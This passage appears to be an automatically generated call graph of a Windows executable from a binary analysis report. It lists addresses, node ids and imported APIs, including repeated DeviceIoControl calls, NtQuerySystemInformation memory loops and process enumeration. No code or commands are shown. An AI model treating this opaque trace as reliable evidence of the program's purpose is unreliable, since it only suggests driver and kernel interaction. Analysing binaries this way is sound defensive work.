?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W 5979->5981 5980->5975 5981->5970 5981->5979 5983 7ff7738e7b30 5982->5983 5984 7ff7738e7b5a 5982->5984 5986 7ff7738ea3c0 9 API calls 5983->5986 5984->5983 5985 7ff7738e7b6c 5984->5985 5987 7ff7738e7b74 memset 5985->5987 5988 7ff7738e7b43 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5986->5988 6356 7ff7738e5e00 5987->6356 5989 7ff7738e7c37 5988->5989 5991 7ff7738f3fc0 8 API calls 5989->5991 5992 7ff7738e7c47 5991->5992 5992->5558 5993 7ff7738ea3c0 9 API calls 5994 7ff7738e7c1e ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5993->5994 5995 7ff7738e7c2f 5994->5995 5996 7ff7738f3fe0 free 5995->5996 5996->5989 6362 7ff7738e7c70 5998->6362 6001 7ff7738e7b00 22 API calls 6002 7ff7738e731f 6001->6002 6003 7ff7738e7c70 21 API calls 6002->6003 6004 7ff7738e7341 6003->6004 6005 7ff7738e7b00 22 API calls 6004->6005 6006 7ff7738e7360 6005->6006 6007 7ff7738e741a 6006->6007 6008 7ff7738e7c70 21 API calls 6006->6008 6009 7ff7738e73c7 6007->6009 6010 7ff7738e743a 6007->6010 6011 7ff7738e7395 6008->6011 6016 7ff7738ea3c0 9 API calls 6009->6016 6012 7ff7738ea7c0 29 API calls 6010->6012 6013 7ff7738e7b00 22 API calls 6011->6013 6014 7ff7738e7446 ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@_K ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6012->6014 6015 7ff7738e73b4 6013->6015 6017 7ff7738ea7c0 29 API calls 6014->6017 6015->6009 6019 7ff7738ea3c0 9 API calls 6015->6019 6018 7ff7738e73d3 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6016->6018 6020 7ff7738e7489 ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@_K ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6017->6020 6044 7ff7738e7acd 6018->6044 6021 7ff7738e73f6 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6019->6021 6376 7ff7738e6d90 6020->6376 6021->6007 6023 7ff7738f3fc0 8 API calls 6024 7ff7738e4df4 6023->6024 6024->5529 6082 7ff7738e7ea0 6024->6082 6026 7ff7738e6d90 9 API calls 6027 7ff7738e74e8 6026->6027 6382 7ff7738e6e90 6027->6382 6030 7ff7738ea3c0 9 API calls 6031 7ff7738e7516 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6030->6031 6032 7ff7738e752f 6031->6032 6402 7ff7738e70e0 6032->6402 6034 7ff7738e7570 DeviceIoControl 6036 7ff7738e7546 6034->6036 6040 7ff7738e754e 6034->6040 6035 7ff7738ea3c0 9 API calls 6037 7ff7738e7a70 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6035->6037 6036->6034 6036->6040 6041 7ff7738e75e8 6036->6041 6038 7ff7738e6fc0 50 API calls 6037->6038 6046 7ff7738e7a88 6038->6046 6039 7ff7738e7600 DeviceIoControl 6039->6040 6039->6041 6040->6035 6041->6039 6042 7ff7738e7678 6041->6042 6043 7ff7738ea7c0 29 API calls 6042->6043 6045 7ff7738e768b ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@PEBX ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6043->6045 6044->6023 6048 7ff7738e76d0 DeviceIoControl 6045->6048 6046->6044 6047 7ff7738e7ac8 6046->6047 6049 7ff7738e7ac1 _invalid_parameter_noinfo_noreturn 6046->6049 6050 7ff7738f3fe0 free 6047->6050 6048->6040 6051 7ff7738e7731 6048->6051 6049->6047 6050->6044 6051->6048 6052 7ff7738e7740 6051->6052 6053 7ff7738e7760 DeviceIoControl 6052->6053 6054 7ff7738e77d0 6052->6054 6053->6040 6053->6052 6054->6040 6055 7ff7738e78aa 6054->6055 6424 7ff7738f4090 AcquireSRWLockExclusive 6054->6424 6056 7ff7738e78b4 6055->6056 6057 7ff7738e78e3 6055->6057 6059 7ff7738ea3c0 9 API calls 6056->6059 6429 7ff7738ec360 6057->6429 6063 7ff7738e78c7 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6059->6063 6063->6040 6083 7ff7738ec9f0 7 API calls 6082->6083 6084 7ff7738e7ef9 6083->6084 6085 7ff7738f32c0 25 API calls 6084->6085 6086 7ff7738e7f03 6085->6086 6087 7ff7738e7f44 6086->6087 6088 7ff7738e7f3f 6086->6088 6089 7ff7738e7f38 _invalid_parameter_noinfo_noreturn 6086->6089 6091 7ff7738e7c70 21 API calls 6087->6091 6109 7ff7738e7f49 6087->6109 6090 7ff7738f3fe0 free 6088->6090 6089->6088 6090->6087 6092 7ff7738e7f6c 6091->6092 6093 7ff7738e7b00 22 API calls 6092->6093 6095 7ff7738e7f8b 6093->6095 6094 7ff7738ea3c0 9 API calls 6096 7ff7738e8966 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6094->6096 6097 7ff7738e7b00 22 API calls 6095->6097 6095->6109 6124 7ff7738e8183 6096->6124 6098 7ff7738e7fc1 6097->6098 6101 7ff7738e6d90 9 API calls 6098->6101 6098->6109 6099 7ff7738f3fc0 8 API calls 6100 7ff7738e4e09 6099->6100 6100->5529 6187 7ff7738e6810 NtQuerySystemInformation 6100->6187 6102 7ff7738e7fe7 6101->6102 6103 7ff7738e6d90 9 API calls 6102->6103 6104 7ff7738e8001 6103->6104 6105 7ff7738ea3c0 9 API calls 6104->6105 6104->6109 6106 7ff7738e802e ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@PEBX ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6105->6106 6107 7ff7738e6e90 50 API calls 6106->6107 6108 7ff7738e8062 6107->6108 6108->6109 6110 7ff7738ea3c0 9 API calls 6108->6110 6109->6094 6109->6124 6111 7ff7738e8085 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6110->6111 6112 7ff7738e80b0 DeviceIoControl 6111->6112 6113 7ff7738e891b 6112->6113 6114 7ff7738e8119 6112->6114 6116 7ff7738ea3c0 9 API calls 6113->6116 6114->6112 6115 7ff7738e8128 6114->6115 6117 7ff7738e8131 6115->6117 6163 7ff7738e818a 6115->6163 6118 7ff7738e892e ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6116->6118 6119 7ff7738ea3c0 9 API calls 6117->6119 6120 7ff7738e6fc0 50 API calls 6118->6120 6121 7ff7738e8144 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6119->6121 6120->6109 6122 7ff7738e6fc0 50 API calls 6121->6122 6124->6099 6125 7ff7738e81e2 DeviceIoControl 6127 7ff7738e8827 6125->6127 6125->6163 6129 7ff7738ea3c0 9 API calls 6127->6129 6130 7ff7738e884c ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6129->6130 6132 7ff7738e855f 6130->6132 6131 7ff7738e8290 DeviceIoControl 6131->6127 6131->6163 6133 7ff7738e6fc0 50 API calls 6132->6133 6135 7ff7738e8866 6133->6135 6134 7ff7738e84e0 DeviceIoControl 6134->6127 6134->6163 6136 7ff7738ea3c0 9 API calls 6135->6136 6140 7ff7738e8825 6135->6140 6139 7ff7738e8339 memset 6142 7ff7738e5e00 9 API calls 6139->6142 6142->6163 6148 7ff7738ec8b0 7 API calls 6148->6163 6149 7ff7738ea3c0 9 API calls 6150 7ff7738e87da ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6149->6150 6151 7ff7738e87ef 6150->6151 6154 7ff7738e856b 6156 7ff7738ea3c0 9 API calls 6154->6156 6162 7ff7738e857e 6156->6162 6157 7ff7738e8564 _invalid_parameter_noinfo_noreturn 6157->6154 6158 7ff7738f3fe0 free 6158->6163 6164 7ff7738ec8b0 7 API calls 6162->6164 6163->6125 6163->6127 6163->6131 6163->6132 6163->6134 6163->6139 6163->6148 6163->6154 6163->6157 6163->6158 6179 7ff7738e8753 6163->6179 6179->6149 6188 7ff7738e68b6 6187->6188 6189 7ff7738e686b 6187->6189 6192 7ff7738e6931 VirtualFree 6188->6192 6193 7ff7738e6cfe 6188->6193 6194 7ff7738e68e0 GetCurrentProcessId 6188->6194 6200 7ff7738e692c 6188->6200 6201 7ff7738e6927 6188->6201 6190 7ff7738e6870 VirtualFree VirtualAlloc NtQuerySystemInformation 6189->6190 6190->6188 6190->6190 6191 7ff7738e6d48 VirtualFree 6191->6193 6192->6193 6195 7ff7738e694b 6192->6195 6196 7ff7738f3fc0 8 API calls 6193->6196 6194->6188 6197 7ff7738e6960 DeviceIoControl 6195->6197 6205 7ff7738e69d8 6195->6205 6198 7ff7738e4e22 6196->6198 6197->6195 6199 7ff7738e6d03 6197->6199 6198->5529 6198->5566 6202 7ff7738ea3c0 9 API calls 6199->6202 6200->6192 6201->6191 6201->6193 6204 7ff7738e6d16 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6202->6204 6203 7ff7738e6a00 DeviceIoControl 6203->6199 6203->6205 6204->6193 6205->6199 6205->6203 6207 7ff7738e6a78 6205->6207 6206 7ff7738e6aa0 DeviceIoControl 6206->6199 6206->6207 6207->6199 6207->6206 6209 7ff7738e6b18 6207->6209 6208 7ff7738e6b40 DeviceIoControl 6208->6199 6208->6209 6209->6199 6209->6208 6210 7ff7738e6bb8 6209->6210 6210->6199 6211 7ff7738e6bc5 6210->6211 6212 7ff7738e6bed memset 6211->6212 6213 7ff7738e5e00 9 API calls 6212->6213 6216 7ff7738e6c10 6213->6216 6214 7ff7738e6c14 6217 7ff7738ea3c0 9 API calls 6214->6217 6215 7ff7738e6c30 DeviceIoControl 6215->6214 6215->6216 6216->6214 6216->6215 6219 7ff7738e6c9c 6216->6219 6218 7ff7738e6ce4 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6217->6218 6220 7ff7738e6cf6 6218->6220 6221 7ff7738ea3c0 9 API calls 6219->6221 6222 7ff7738f3fe0 free 6220->6222 6223 7ff7738e6caf 6221->6223 6222->6193 6224 7ff7738ea3c0 9 API calls 6223->6224 6225 7ff7738e6cbd ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6224->6225 6225->6220 6227 7ff7738ec9f0 7 API calls 6226->6227 6228 7ff7738e5073 6227->6228 6229 7ff7738f32c0 25 API calls 6228->6229 6230 7ff7738e507d 6229->6230 6231 7ff7738e50be 6230->6231 6232 7ff7738e50b9 6230->6232 6236 7ff7738e50b2 _invalid_parameter_noinfo_noreturn 6230->6236 6233 7ff7738e50c3 6231->6233 6234 7ff7738e50ea 6231->6234 6237 7ff7738f3fe0 free 6232->6237 6238 7ff7738ea7c0 29 API calls 6233->6238 6235 7ff7738e7c70 21 API calls 6234->6235 6239 7ff7738e5101 6235->6239 6236->6232 6237->6231 6240 7ff7738e50d6 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6238->6240 6241 7ff7738e7b00 22 API calls 6239->6241 6242 7ff7738e514b 6240->6242 6243 7ff7738e5120 6241->6243 6244 7ff7738f3fc0 8 API calls 6242->6244 6245 7ff7738e5128 6243->6245 6247 7ff7738e7c70 21 API calls 6243->6247 6246 7ff7738e4e34 6244->6246 6248 7ff7738ea7c0 29 API calls 6245->6248 6246->5542 6246->5569 6249 7ff7738e5191 6247->6249 6250 7ff7738e513b ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6248->6250 6250->6242 6318 7ff7738ea09a 6317->6318 6319 7ff7738e9fde ?_Fiopen@std@@YAPEAU_iobuf@@PEB_WHH 6317->6319 6321 7ff7738f3fc0 8 API calls 6318->6321 6319->6318 6320 7ff7738e9ffc ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ _get_stream_buffer_pointers ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2 6319->6320 6322 7ff7738ec7a0 18 API calls 6320->6322 6324 7ff7738e8a94 6321->6324 6323 7ff7738ea08a ?always_noconv@codecvt_base@std@ 6322->6323 6323->6318 6325 7ff7738ea0a0 ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 6323->6325 6324->5888 6324->5889 6325->6318 6327 7ff7738ed35e memmove memmove 6326->6327 6328 7ff7738ed2c7 6326->6328 6327->5899 6329 7ff7738ed3a6 6328->6329 6331 7ff7738ed349 6328->6331 6332 7ff7738ed327 6328->6332 6330 7ff7738e1190 Concurrency::cancel_current_task __std_exception_copy 6329->6330 6333 7ff7738ed3ab 6330->6333 6335 7ff7738f4108 std::_Facet_Register 3 API calls 6331->6335 6336 7ff7738ed334 6331->6336 6334 7ff7738f4108 std::_Facet_Register 3 API calls 6332->6334 6337 7ff7738ed32f 6334->6337 6335->6336 6336->6327 6337->6336 6338 7ff7738ed342 _invalid_parameter_noinfo_noreturn 6337->6338 6338->6331 6343 7ff7738ecb52 6342->6343 6344 7ff7738ecbc7 ??1_Lockit@std@@QEAA 6343->6344 6345 7ff7738ecb75 6343->6345 6346 7ff7738ecb69 ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12 6343->6346 6347 7ff7738f3fc0 8 API calls 6344->6347 6345->6344 6349 7ff7738ecb8c ?_Getcat@?$ctype@_W@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@ 6345->6349 6346->6345 6348 7ff7738ecbe2 6347->6348 6348->5976 6350 7ff7738ecba0 6349->6350 6351 7ff7738ecbf7 6349->6351 6352 7ff7738f3868 std::_Facet_Register 3 API calls 6350->6352 6353 7ff7738e1280 Concurrency::cancel_current_task 2 API calls 6351->6353 6354 7ff7738ecbb2 6352->6354 6355 7ff7738ecbfc 6353->6355 6354->6344 6357 7ff7738e5e36 6356->6357 6358 7ff7738e5eba 6356->6358 6357->6358 6359 7ff7738e5e40 DeviceIoControl 6357->6359 6360 7ff7738f3fc0 8 API calls 6358->6360 6359->6357 6359->6358 6361 7ff7738e5ec9 6360->6361 6361->5993 6361->5995 6363 7ff7738e7c80 6362->6363 6364 7ff7738e7cd0 DeviceIoControl 6363->6364 6374 7ff7738e7d58 6363->6374 6375 7ff7738e7ca3 6363->6375 6364->6363 6366 7ff7738e7e6d 6364->6366 6365 7ff7738f3fc0 8 API calls 6368 7ff7738e7300 6365->6368 6367 7ff7738ea3c0 9 API calls 6366->6367 6369 7ff7738e7e80 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6367->6369 6368->6001 6369->6375 6370 7ff7738e7dd8 6371 7ff7738ea3c0 9 API calls 6370->6371 6370->6375 6373 7ff7738e7deb ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6371->6373 6372 7ff7738e7da0 memcmp 6372->6374 6373->6375 6374->6370 6374->6372 6374->6374 6375->6365 6377 7ff7738e6dd1 DeviceIoControl 6376->6377 6378 7ff7738e6e3f 6377->6378 6379 7ff7738e6e4f 6377->6379 6378->6377 6378->6379 6380 7ff7738f3fc0 8 API calls 6379->6380 6381 7ff7738e6e6b 6380->6381 6381->6026 6383 7ff7738e6ea2 6382->6383 6392 7ff7738e6f96 6382->6392 6384 7ff7738e6f69 6383->6384 6385 7ff7738f4090 3 API calls 6383->6385 6386 7ff7738e6f73 6384->6386 6387 7ff7738e6f9e 6384->6387 6388 7ff7738e6ece 6385->6388 6389 7ff7738ea3c0 9 API calls 6386->6389 6505 7ff7738ebf40 6387->6505 6388->6384 6393 7ff7738ec9f0 7 API calls 6388->6393 6391 7ff7738e6f86 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6389->6391 6391->6392 6392->6030 6394 7ff7738e6f03 6393->6394 6478 7ff7738e6440 6394->6478 6397 7ff7738e6f5c 6504 7ff7738f4024 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 6397->6504 6398 7ff7738e6f57 6401 7ff7738f3fe0 free 6398->6401 6400 7ff7738e6f50 _invalid_parameter_noinfo_noreturn 6400->6398 6401->6397 6405 7ff7738e7132 6402->6405 6403 7ff7738e7275 6404 7ff7738f3fc0 8 API calls 6403->6404 6407 7ff7738e7296 6404->6407 6405->6403 6406 7ff7738e722f 6405->6406 6410 7ff7738f4090 3 API calls 6405->6410 6408 7ff7738e725e 6406->6408 6409 7ff7738e7239 6406->6409 6407->6036 6528 7ff7738ec580 6408->6528 6411 7ff7738ea3c0 9 API calls 6409->6411 6412 7ff7738e7182 6410->6412 6414 7ff7738e724c ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6411->6414 6412->6406 6415 7ff7738ec9f0 7 API calls 6412->6415 6414->6403 6416 7ff7738e71b7 6415->6416 6417 7ff7738e6440 27 API calls 6416->6417 6418 7ff7738e71c9 6417->6418 6419 7ff7738e7210 6418->6419 6420 7ff7738e720b 6418->6420 6422 7ff7738e7204 _invalid_parameter_noinfo_noreturn 6418->6422 6527 7ff7738f4024 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 6419->6527 6423 7ff7738f3fe0 free 6420->6423 6422->6420 6423->6419 6425 7ff7738f40a6 6424->6425 6426 7ff7738f40ab ReleaseSRWLockExclusive 6425->6426 6427 7ff7738f40b0 SleepConditionVariableSRW 6425->6427 6427->6425 6430 7ff7738ec3a4 6429->6430 6431 7ff7738ec3de 6429->6431 6430->6431 6479 7ff7738e647a memset 6478->6479 6480 7ff7738e6634 6478->6480 6481 7ff7738e64b0 DeviceIoControl 6479->6481 6483 7ff7738f3fc0 8 API calls 6480->6483 6481->6480 6482 7ff7738e651e 6481->6482 6482->6481 6486 7ff7738e652d 6482->6486 6484 7ff7738e6757 6483->6484 6484->6397 6484->6398 6484->6400 6485 7ff7738e6550 DeviceIoControl 6485->6480 6485->6486 6486->6480 6486->6485 6487 7ff7738e65cc 6486->6487 6487->6480 6488 7ff7738e65e3 VirtualAlloc 6487->6488 6489 7ff7738e5e00 9 API calls 6488->6489 6490 7ff7738e661f 6489->6490 6491 7ff7738e6623 VirtualFree 6490->6491 6496 7ff7738e663b 6490->6496 6491->6480 6492 7ff7738e672d VirtualFree 6492->6480 6493 7ff7738ec9f0 7 API calls 6493->6496 6494 7ff7738e66c3 _stricmp 6495 7ff7738e6769 6494->6495 6494->6496 6497 7ff7738e67ec VirtualFree 6495->6497 6498 7ff7738e679f VirtualFree 6495->6498 6501 7ff7738e67b0 6495->6501 6496->6492 6496->6493 6496->6494 6499 7ff7738e67e5 _invalid_parameter_noinfo_noreturn 6496->6499 6500 7ff7738f3fe0 free 6496->6500 6497->6501 6498->6501 6499->6497 6500->6496 6501->6480 6501->6499 6502 7ff7738e67ff 6501->6502 6503 7ff7738f3fe0 free 6502->6503 6503->6480 6506 7ff7738ebf80 6505->6506 6507 7ff7738ebfba 6505->6507 6506->6507 6508 7ff7738ebf85 GetModuleHandleA 6506->6508 6509 7ff7738f3fc0 8 API calls 6507->6509 6510 7ff7738ebfe3 GetProcAddress 6508->6510 6511 7ff7738ebf97 6508->6511 6512 7ff7738ebfc8 6509->6512 6510->6511 6513 7ff7738ec004 6510->6513 6515 7ff7738ea3c0 9 API calls 6511->6515 6512->6392 6514 7ff7738ec020 DeviceIoControl 6513->6514 6517 7ff7738ec098 6513->6517 6514->6507 6514->6513 6516 7ff7738ebfaa ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6515->6516 6516->6507 6521 7ff7738e5ef0 6517->6521 6519 7ff7738ec0ae 6519->6507 6520 7ff7738ec0d2 DeviceIoControl 6519->6520 6520->6507 6520->6519 6523 7ff7738e5fa6 6521->6523 6525 7ff7738e5f26 6521->6525 6522 7ff7738e5f30 DeviceIoControl 6522->6523 6522->6525 6524 7ff7738f3fc0 8 API calls 6523->6524 6526 7ff7738e5fb5 6524->6526 6525->6522 6525->6523 6526->6519 6529 7ff7738ec5c4 6528->6529 6543 7ff7738ec5fe 6528->6543 6530 7ff7738ec5c9 GetModuleHandleA 6529->6530 6529->6543 6532 7ff7738ec5db 6530->6532 6533 7ff7738ec627 GetProcAddress 6530->6533 6531 7ff7738f3fc0 8 API calls 6534 7ff7738ec60c 6531->6534 6536 7ff7738ea3c0 9 API calls 6532->6536 6533->6532 6538 7ff7738ec648 6533->6538 6534->6403 6535 7ff7738ec660 DeviceIoControl 6535->6538 6535->6543 6537 7ff7738ec5ee ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6536->6537 6537->6543 6538->6535 6539 7ff7738ec6dc 6538->6539 6540 7ff7738e5ef0 9 API calls 6539->6540 6542 7ff7738ec6f0 6540->6542 6541 7ff7738ec720 DeviceIoControl 6541->6542 6541->6543 6542->6541 6542->6543 6543->6531 6601 7ff7738f1507 memset Process32FirstW 6600->6601 6607 7ff7738f154b 6600->6607 6602 7ff7738f1533 6601->6602 6601->6607 6605 7ff7738f1539 Process32NextW 6602->6605 6602->6607 6603 7ff7738f1560 6606 7ff7738f3fc0 8 API calls 6603->6606 6604 7ff7738f1557 CloseHandle 6604->6603 6605->6602 6605->6607 6608 7ff7738f1572 6606->6608 6607->6603 6607->6604 6608->5573 6612 7ff7738f3518 6609->6612 6610 7ff7738f3526 ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 6610->6612 6611 7ff7738f3551 ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 6611->6612 6612->6610 6612->6611 6614 7ff7738f35de ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 6612->6614 6616 7ff7738f3601 ?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 6612->6616 6618 7ff7738f3575 6612->6618 6613 7ff7738f35b5 ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 6613->6618 6614->6612 6615 7ff7738f3647 ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 6615->6618 6616->6612 6617 7ff7738f3665 6617->5624 6618->6613 6618->6615 6618->6617 6619 7ff7738f368e ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 6618->6619 6621 7ff7738f36ce ?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 6618->6621 6622 7ff7738f36f0 6618->6622 6619->6618 6621->6618 6623 7ff7738f3853 6622->6623 6624 7ff7738f3728 6622->6624 6642 7ff7738ed3b0 ?_Xlength_error@std@@YAXPEBD 6623->6642 6626 7ff7738f374e 6624->6626 6627 7ff7738f379a 6624->6627 6628 7ff7738f3858 6626->6628 6629 7ff7738f4108 std::_Facet_Register 3 API calls 6626->6629 6630 7ff7738f4108 std::_Facet_Register 3 API calls 6627->6630 6632 7ff7738f375d 6627->6632 6631 7ff7738e1190 Concurrency::cancel_current_task __std_exception_copy 6628->6631 6629->6632 6630->6632 6634 7ff7738f385e ??1_Lockit@std@@QEAA 6631->6634 6633 7ff7738f384c _invalid_parameter_noinfo_noreturn 6632->6633 6635 7ff7738f37cd memmove 6632->6635 6636 7ff7738f37c8 6632->6636 6633->6623 6637 7ff7738f37e6 memmove 6635->6637 6636->6637 6638 7ff7738f37f3 6637->6638 6639 7ff7738f3820 6637->6639 6638->6633 6640 7ff7738f3818 6638->6640 6639->6618 6641 7ff7738f3fe0 free 6640->6641 6641->6639 6644 7ff7738ed94d 6643->6644 6645 7ff7738ed9ec 6643->6645 6646 7ff7738f4090 3 API calls 6644->6646 6647 7ff7738ed9f6 6645->6647 6648 7ff7738eda6b 6645->6648 6650 7ff7738ed959 6646->6650 6651 7ff7738ea3c0 9 API calls 6647->6651 6926 7ff7738eb280 6648->6926 6650->6645 6654 7ff7738ec9f0 7 API calls 6650->6654 6652 7ff7738eda09 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6651->6652 6653 7ff7738eda19 6652->6653 6657 7ff7738ea3c0 9 API calls 6653->6657 6655 7ff7738ed989 6654->6655 6658 7ff7738e6440 27 API calls 6655->6658 6656 7ff7738edad0 DeviceIoControl 6656->6653 6659 7ff7738eda9d 6656->6659 6660 7ff7738eda2c ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6657->6660 6661 7ff7738ed99a 6658->6661 6659->6653 6659->6656 6663 7ff7738edb48 6659->6663 6685 7ff7738eda3c 6660->6685 6662 7ff7738ed9df 6661->6662 6664 7ff7738ed9da 6661->6664 6669 7ff7738ed9d3 _invalid_parameter_noinfo_noreturn 6661->6669 6925 7ff7738f4024 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 6662->6925 6666 7ff7738edb50 6663->6666 6667 7ff7738edb88 6663->6667 6670 7ff7738f3fe0 free 6664->6670 6672 7ff7738ea3c0 9 API calls 6666->6672 6671 7ff7738edc39 6667->6671 6675 7ff7738f4090 3 API calls 6667->6675 6668 7ff7738f3fc0 8 API calls 6673 7ff7738eda4a 6668->6673 6669->6664 6670->6662 6674 7ff7738edc66 6671->6674 6677 7ff7738ea3c0 9 API calls 6671->6677 6676 7ff7738edb63 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6672->6676 6673->5660 6687 7ff7738edc8f 6674->6687 6943 7ff7738eb4a0 6674->6943 6678 7ff7738edba4 6675->6678 6680 7ff7738e6200 50 API calls 6676->6680 6682 7ff7738edc56 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6677->6682 6678->6671 6684 7ff7738ec9f0 7 API calls 6678->6684 6681 7ff7738edb7b 6680->6681 6683 7ff7738e6320 50 API calls 6681->6683 6682->6674 6683->6685 6686 7ff7738edbd6 6684->6686 6685->6668 6688 7ff7738e6440 27 API calls 6686->6688 6689 7ff7738edd40 6687->6689 6690 7ff7738f4090 3 API calls 6687->6690 6694 7ff7738edbe7 6688->6694 6691 7ff7738ea3c0 9 API calls 6689->6691 6712 7ff7738edd6d 6689->6712 6695 7ff7738edcab 6690->6695 6696 7ff7738edd5d ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6691->6696 6693 7ff7738edc2c 6942 7ff7738f4024 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 6693->6942 6694->6693 6698 7ff7738edc27 6694->6698 6701 7ff7738edc20 _invalid_parameter_noinfo_noreturn 6694->6701 6695->6689 6700 7ff7738ec9f0 7 API calls 6695->6700 6696->6712 6699 7ff7738f3fe0 free 6698->6699 6699->6693 6702 7ff7738edcdd 6700->6702 6701->6698 6705 7ff7738e6440 27 API calls 6702->6705 6703 7ff7738ea3c0 9 API calls 6706 7ff7738edd80 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6703->6706 6704 7ff7738eddb6 6707 7ff7738ea3c0 9 API calls 6704->6707 6708 7ff7738edcee 6705->6708 6709 7ff7738e60d0 50 API calls 6706->6709 6710 7ff7738eddc9 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6707->6710 6711 7ff7738edd33 6708->6711 6713 7ff7738edd2e 6708->6713 6715 7ff7738edd27 _invalid_parameter_noinfo_noreturn 6708->6715 6709->6712 6710->6685 6959 7ff7738f4024 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 6711->6959 6712->6703 6712->6704 6960 7ff7738eb6d0 6712->6960 6716 7ff7738f3fe0 free 6713->6716 6715->6713 6716->6711 6718 7ff7738edee5 6717->6718 6719 7ff7738ede28 6717->6719 6976 7ff7738eac30 6718->6976 6721 7ff7738e7c70 21 